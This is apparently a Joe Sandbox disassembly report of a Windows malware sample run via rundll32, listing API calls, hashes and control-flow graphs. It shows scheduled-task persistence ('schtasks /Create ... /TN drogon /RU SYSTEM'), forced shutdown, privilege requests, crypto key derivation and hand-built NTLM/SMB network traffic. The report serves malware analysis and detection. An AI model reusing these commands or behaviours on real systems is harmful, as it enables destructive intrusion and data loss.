                                              • Opcode ID: b7144853294ce2da0c5eef0bcc9c6b6f40bf292f238cab9e0e9a9c2741fba234
                                              • Instruction ID: ef3fce9ed6c05bc725c5291f69e4da068398588b849c22ee2d02d6e9a3078695
                                              • Opcode Fuzzy Hash: b7144853294ce2da0c5eef0bcc9c6b6f40bf292f238cab9e0e9a9c2741fba234
                                              • Instruction Fuzzy Hash: 8451D472104245AFDB31DF34CC849AAB3A9EB80714F644B9AFE5AC7094E732E94EC751
                                              APIs
                                              • GetLocalTime.KERNEL32(?,00000000), ref: 04BF81AF
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF81F2
                                              • PathAppendW.SHLWAPI(?,?), ref: 04BF82AF
                                              • wsprintfW.USER32 ref: 04BF82CE
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Strings
                                              • schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 04BF82C8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
                                              • String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
                                              • API String ID: 2586884543-3727968613
                                              • Opcode ID: 96e2d5593e988aafa862b2bcfa2747a4f3201e369a7a8b223758be41eeb4e337
                                              • Instruction ID: d8ccab8c4b5bb1fc7bdd55b5201ce9c74e6ef7f50b88e74d6c9e56b13b3bbc89
                                              • Opcode Fuzzy Hash: 96e2d5593e988aafa862b2bcfa2747a4f3201e369a7a8b223758be41eeb4e337
                                              • Instruction Fuzzy Hash: 9441D622A58348A9EB10DBE4EC16BFE7375EF44B10F10545BE604FB1D0E7B55A84C369
                                              APIs
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80BC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80CC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80DC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80EC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF8126
                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04BF8A54
                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 04BF8A61
                                              • ExitProcess.KERNEL32 ref: 04BF8A68
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Strings
                                              • schtasks /Delete /F /TN drogon, xrefs: 04BF8A35
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                              • String ID: schtasks /Delete /F /TN drogon
                                              • API String ID: 3579268615-951750757
                                              • Opcode ID: 00a38238adc546238de17f9ff8deaac5115ce3249003f650cb758e9084cc907d
                                              • Instruction ID: cc8949f6e088f90cdd263d1098c7aa88fbb4b6aa14f7fe55d8a22ee90ac07561
                                              • Opcode Fuzzy Hash: 00a38238adc546238de17f9ff8deaac5115ce3249003f650cb758e9084cc907d
                                              • Instruction Fuzzy Hash: 65E04620252260B6E23677716C1DFDB2D4DEF02B99F044280FB4E61080CB9A6A8AC5F5
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04BF9090
                                              • LoadLibraryA.KERNELBASE(?), ref: 04BF90BA
                                              • GetProcAddress.KERNELBASE(00000000,?), ref: 04BF90FD
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04BF913D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                              • String ID:
                                              • API String ID: 3300690313-0
                                              • Opcode ID: 56d92596e993abba21a27104da6ff32b14a141e6deab0acdd6baafda1e55c292
                                              • Instruction ID: 2574ab77260515ad61ea3c597bb1a594c063b46ceab6ae23148a25cd3b924a17
                                              • Opcode Fuzzy Hash: 56d92596e993abba21a27104da6ff32b14a141e6deab0acdd6baafda1e55c292
                                              • Instruction Fuzzy Hash: FB413BB1900216EFDB14CFA8CC88BA9B7F8FF04315F1544A9DA19A7251D374EA94CB50
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60A6
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60BA
                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60D3
                                              • CryptDestroyHash.ADVAPI32(?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60DF
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04BF55BC
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04BF55CB
                                                • Part of subcall function 04BF559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04BF55DA
                                                • Part of subcall function 04BF559B: LocalAlloc.KERNEL32(00000040,?), ref: 04BF55EE
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF5601
                                                • Part of subcall function 04BF559B: LocalFree.KERNEL32(?), ref: 04BF5606
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                              • String ID:
                                              • API String ID: 797921460-0
                                              • Opcode ID: 93889b94884bd419cf4301b389614f7fe9adb0ce41ff049544b424a3041a08b7
                                              • Instruction ID: c251eb638056ee962526363294f47f2510a7f9d2c4006b94a98b49032645c495
                                              • Opcode Fuzzy Hash: 93889b94884bd419cf4301b389614f7fe9adb0ce41ff049544b424a3041a08b7
                                              • Instruction Fuzzy Hash: 42011271900108BFEB119FB5DCC5D9EBBBDEB04750B1004AAFA05E6140D771AE459B20
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF84FC
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04BF851B
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04BF853E
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 04BF8556
                                                • Part of subcall function 04BF841D: GetCurrentProcessId.KERNEL32(?,04BF8555,?,?), ref: 04BF8430
                                                • Part of subcall function 04BF841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04BF8555,?,?), ref: 04BF844C
                                                • Part of subcall function 04BF841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04BF8555,?,?), ref: 04BF8464
                                                • Part of subcall function 04BF841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04BF8555,?,?), ref: 04BF847D
                                                • Part of subcall function 04BF841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04BF84A3
                                                • Part of subcall function 04BF841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 04BF84BA
                                                • Part of subcall function 04BF841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 04BF84CB
                                                • Part of subcall function 04BF841D: FreeSid.ADVAPI32(?), ref: 04BF84D4
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(?), ref: 04BF84DD
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(?,?,?,?,04BF8555,?,?), ref: 04BF84E2
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(00000000,?,?,?,04BF8555,?,?), ref: 04BF84E5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 3524103904-0
                                              • Opcode ID: 17bb49c5d8d991589e41888b0ba7822441a257b60d50cb64056fbb3a113bbc8e
                                              • Instruction ID: fe491b6fd0f02da5e9276f48bdcf28ce2a364840fff4837f7db4213c192cbeab
                                              • Opcode Fuzzy Hash: 17bb49c5d8d991589e41888b0ba7822441a257b60d50cb64056fbb3a113bbc8e
                                              • Instruction Fuzzy Hash: 7BF03071501524ABEB217BB4AC0EFDE7A7CDB09314F1001D2EA1EE2090E774FE588EA5
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04BF5561
                                              • GetLastError.KERNEL32(?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF556B
                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF5581
                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF558E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                              • String ID:
                                              • API String ID: 2963463078-0
                                              • Opcode ID: 4d4f3f8835d3010a30353e525a10b3b55256fdcdd942f6b92d96a92c10f5876d
                                              • Instruction ID: aa27b5208e59fd58f621fca20f35c2b2cfd4c0eba4d7897d4b96ccda03f6f062
                                              • Opcode Fuzzy Hash: 4d4f3f8835d3010a30353e525a10b3b55256fdcdd942f6b92d96a92c10f5876d
                                              • Instruction Fuzzy Hash: 69F01C36600208FBDF205BB6ED09F8E7ABEEBC4711F204055FA0AD7110D638AE15EB20
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04BF62C3,?), ref: 04BF5520
                                              • GetLastError.KERNEL32(?,04BF62C3,?), ref: 04BF5528
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04BF62C3,?), ref: 04BF553E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: AcquireContextCrypt$ErrorLast
                                              • String ID:
                                              • API String ID: 2779411412-0
                                              • Opcode ID: d3bfbb9ff6718c0fdd8d87f6271fd00b5e3586cc4c48b3e210f324b9d4add08d
                                              • Instruction ID: e75dec6fbdecc7d167cd700c17d1ca57d81af62a926696d30b1e9ea4d54ac776
                                              • Opcode Fuzzy Hash: d3bfbb9ff6718c0fdd8d87f6271fd00b5e3586cc4c48b3e210f324b9d4add08d
                                              • Instruction Fuzzy Hash: 66E04F7138421D7AFB2019989C82F567A9DDB18754F108067F709E6191CAD1BD1457F4
                                              APIs
                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,70204950,?,?,04BF8C7C), ref: 04BF7D5F
                                              • NetApiBufferFree.NETAPI32(?,?,?,04BF8C7C), ref: 04BF7D82
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferFreeInfoServer
                                              • String ID:
                                              • API String ID: 3855943681-0
                                              • Opcode ID: 18f670c5d51ca132adff663fa53196a8ad99c2ff19ec677b634d19f8bb166ce9
                                              • Instruction ID: 745ef822a91e30393c04e30752764f69acb99a8a4e025e0e89c1ec89900726bc
                                              • Opcode Fuzzy Hash: 18f670c5d51ca132adff663fa53196a8ad99c2ff19ec677b634d19f8bb166ce9
                                              • Instruction Fuzzy Hash: A3E09BB5701624A7EF24CA95CD04BBA765CDF00651B4001DAAD56D3100E720EE0696E0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4bf1747-4bf1757 1 4bf175a-4bf1763 0->1 1->1 2 4bf1765-4bf1795 GetProcessHeap HeapAlloc 1->2 3 4bf179b-4bf17a0 2->3 4 4bf1c30-4bf1c37 2->4 5 4bf17a2-4bf17af 3->5 5->5 6 4bf17b1-4bf17bb CharUpperW 5->6 7 4bf17be-4bf17c7 6->7 7->7 8 4bf17c9-4bf17e6 GetProcessHeap HeapAlloc 7->8 9 4bf17ec-4bf184b htons 8->9 10 4bf1c22-4bf1c2a GetProcessHeap HeapFree 8->10 11 4bf184e-4bf1857 9->11 10->4 11->11 12 4bf1859-4bf186b send 11->12 13 4bf1c16-4bf1c1c GetProcessHeap HeapFree 12->13 14 4bf1871-4bf188a recv 12->14 13->10 14->13 15 4bf1890-4bf18a5 14->15 15->13 16 4bf18ab-4bf18ad 15->16 17 4bf18ae-4bf18c1 16->17 18 4bf18ce-4bf18d2 17->18 19 4bf18c3-4bf18c5 17->19 18->17 20 4bf18d4 18->20 19->18 21 4bf18c7-4bf18cc 19->21 20->13 21->18 22 4bf18d9-4bf1904 GetProcessHeap HeapAlloc 21->22 22->13 23 4bf190a-4bf1926 call 4bf15a7 22->23 26 4bf192c-4bf1948 call 4bf15a7 23->26 27 4bf1c08-4bf1c10 GetProcessHeap HeapFree 23->27 26->27 30 4bf194e-4bf1962 GetProcessHeap HeapAlloc 26->30 27->13 31 4bf1bfa-4bf1c02 GetProcessHeap HeapFree 30->31 32 4bf1968-4bf197c 30->32 31->27 33 4bf1983-4bf1994 rand 32->33 33->33 34 4bf1996-4bf19ae call 4bf15a7 33->34 37 4bf1bec-4bf1bf4 GetProcessHeap HeapFree 34->37 38 4bf19b4-4bf19c2 GetProcessHeap HeapAlloc 34->38 37->31 39 4bf1bde-4bf1be6 GetProcessHeap HeapFree 38->39 40 4bf19c8-4bf19e5 38->40 39->37 41 4bf19e7-4bf19ed 40->41 42 4bf19f4-4bf1a08 40->42 41->42 43 4bf1a0e-4bf1a20 GetProcessHeap HeapAlloc 42->43 44 4bf1a0a 42->44 45 4bf1a26-4bf1a74 htons 43->45 46 4bf1bc3-4bf1bdb GetProcessHeap HeapFree 43->46 44->43 47 4bf1a7d-4bf1ad1 45->47 48 4bf1a76-4bf1a79 45->48 46->39 49 4bf1b0e-4bf1b2d 47->49 50 4bf1ad3-4bf1b0c 47->50 48->47 51 4bf1b31-4bf1b55 memcpy 49->51 50->51 52 4bf1b57-4bf1b64 51->52 53 4bf1b66-4bf1b6f 51->53 54 4bf1b71-4bf1b82 send 52->54 53->54 55 4bf1b84-4bf1b9b recv 54->55 56 4bf1bb3-4bf1bbd GetProcessHeap HeapFree 54->56 55->56 57 4bf1b9d-4bf1ba1 55->57 56->46 58 4bf1ba7-4bf1bb0 memset 57->58 59 4bf1ba3 57->59 58->56 59->58
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04BF1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04BF1783
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF178C
                                              • CharUpperW.USER32(00000000), ref: 04BF17B2
                                              • GetProcessHeap.KERNEL32(00000008,00000086), ref: 04BF17DA
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF17DD
                                              • htons.WS2_32(00000082), ref: 04BF1801
                                              • send.WS2_32(00000086,?,00000086,00000041), ref: 04BF1863
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF187F
                                              • GetProcessHeap.KERNEL32(00000008,00000018), ref: 04BF18F4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF18FD
                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04BF1958
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF195B
                                              • rand.MSVCRT ref: 04BF1983
                                              • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 04BF19B8
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF19BB
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1A13
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF1A16
                                              • htons.WS2_32(-000000FC), ref: 04BF1A39
                                              • memcpy.MSVCRT ref: 04BF1B48
                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 04BF1B7A
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF1B93
                                              • memset.MSVCRT ref: 04BF1BAB
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1BB6
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BBD
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1BC8
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BCF
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1BE3
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BE6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04BF1BF1
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BF4
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1BFF
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C02
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04BF1C0D
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C10
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1C19
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C1C
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1C27
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C2A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                              • String ID: NTLM$SSP
                                              • API String ID: 2370844593-3976291102
                                              • Opcode ID: c9b3ed60ad4259f46f44bd26e4be92acf9e36f3310925807b745f7411830b5d4
                                              • Instruction ID: 98919609caee188cae9340ad4a6259e3b50844887a6bf3513669f5ee6b368b96
                                              • Opcode Fuzzy Hash: c9b3ed60ad4259f46f44bd26e4be92acf9e36f3310925807b745f7411830b5d4
                                              • Instruction Fuzzy Hash: 41F19E75900245EFDF14DFA8CC85BAA7BB4FF48300F04849AEA49DB292E775E805DB64

                                              Control-flow Graph

                                              control_flow_graph 109 4bf2497-4bf24bf GetProcessHeap HeapAlloc 110 4bf26ff-4bf2705 109->110 111 4bf24c5-4bf24d6 GetProcessHeap HeapAlloc 109->111 112 4bf26ec-4bf26fe GetProcessHeap HeapFree 111->112 113 4bf24dc-4bf255d rand htons 111->113 112->110 114 4bf256f-4bf258a GetProcessHeap HeapAlloc 113->114 115 4bf255f-4bf256d rand 113->115 116 4bf26dc-4bf26e6 GetProcessHeap HeapFree 114->116 117 4bf2590-4bf25cb htons 114->117 115->114 115->115 116->112 118 4bf25cd-4bf25db rand 117->118 118->118 119 4bf25dd-4bf25f8 GetProcessHeap HeapAlloc 118->119 120 4bf25fe-4bf2634 memcpy * 2 send 119->120 121 4bf26cc-4bf26d6 GetProcessHeap HeapFree 119->121 122 4bf26ba-4bf26c6 GetProcessHeap HeapFree 120->122 123 4bf263a-4bf2651 send 120->123 121->116 122->121 123->122 124 4bf2653-4bf2667 123->124 125 4bf2694-4bf269b recv 124->125 126 4bf269d 125->126 127 4bf2669-4bf2677 125->127 126->122 127->122 128 4bf2679-4bf2680 127->128 128->122 129 4bf2682-4bf2688 128->129 130 4bf269f-4bf26a3 129->130 131 4bf268a-4bf2693 129->131 132 4bf26b6 130->132 133 4bf26a5-4bf26b4 call 4bf2344 130->133 131->125 132->122 133->122
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24AF
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24B8
                                              • GetProcessHeap.KERNEL32(00000008,00001124,771AF380,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24CD
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24D0
                                              • rand.MSVCRT ref: 04BF24E1
                                              • htons.WS2_32(00001120), ref: 04BF24FF
                                              • rand.MSVCRT ref: 04BF255F
                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF2576
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF257D
                                              • htons.WS2_32(0000015C), ref: 04BF259F
                                              • rand.MSVCRT ref: 04BF25CD
                                              • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF25E4
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF25EB
                                              • memcpy.MSVCRT ref: 04BF2605
                                              • memcpy.MSVCRT ref: 04BF2617
                                              • send.WS2_32(?,00000000,0000111C,00000000), ref: 04BF2630
                                              • send.WS2_32(?,?,00000168,00000000), ref: 04BF264D
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF2697
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26BF
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26C6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26CF
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26D6
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26DF
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26E6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26F1
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26F8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmp
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmp
